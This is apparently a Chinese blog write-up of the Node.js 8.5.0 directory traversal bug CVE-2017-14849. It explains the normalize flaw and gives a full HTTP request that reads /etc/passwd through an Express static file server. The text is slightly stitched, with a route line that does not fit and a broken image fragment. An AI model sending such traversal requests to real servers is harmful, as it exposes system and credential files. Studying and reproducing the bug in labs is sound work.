Node.js 目录穿越漏洞(CVE-2017-14849)
by ADummy
0x00利用路线
连接到数据库,直接命令执行
0x01漏洞介绍
原因是 Node.js 8.5.0 对目录进行normalize操作时出现了逻辑错误,导致向上层跳跃的时候(如../../../../../../etc/passwd),在中间位置增加foo/../(如../../../foo/../../../../etc/passwd),即可使normalize返回/etc/passwd,但实际上正确结果应该是../../../../../../etc/passwd。
express这类web框架,通常会提供了静态文件服务器的功能,这些功能依赖于normalize函数。比如,express在判断path是否超出静态目录范围时,就用到了normalize函数,上述BUG导致normalize函数返回错误结果导致绕过了检查,造成任意文件读取漏洞。
当然,normalize的BUG可以影响的绝非仅有express,更有待深入挖掘。不过因为这个BUG是node 8.5.0 中引入的,在 8.6 中就进行了修复,所以影响范围有限。
0x02漏洞复现
访问http://your-ip:3000/即可查看到一个web页面,其中引用到了文件/static/main.js,说明其存在静态文件服务器。
发送如下数据包,即可读取passwd:
GET /static/../../../a/../../../../etc/passwd HTTP/1.1
Host: your-ip:3000
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close


g-EreW03u4-1615173855909)]
Node.js 目录穿越漏洞CVE-2017-14849:Express框架中的任意文件读取风险
这篇博客介绍了Node.js中的一个安全漏洞,即CVE-2017-14849,该漏洞允许攻击者通过目录穿越技术读取任意文件。问题源于Node.js 8.5.0版本在目录规范化处理上的逻辑错误,使得路径如'../../../foo/../../../../etc/passwd'被错误地规范化为'/etc/passwd'。利用此漏洞,攻击者可能在使用Express等依赖normalize函数的Web框架时,绕过文件访问限制,读取敏感信息。虽然在8.6版本中已修复,但该漏洞的影响仍然值得关注。
1407

被折叠的 条评论
为什么被折叠?



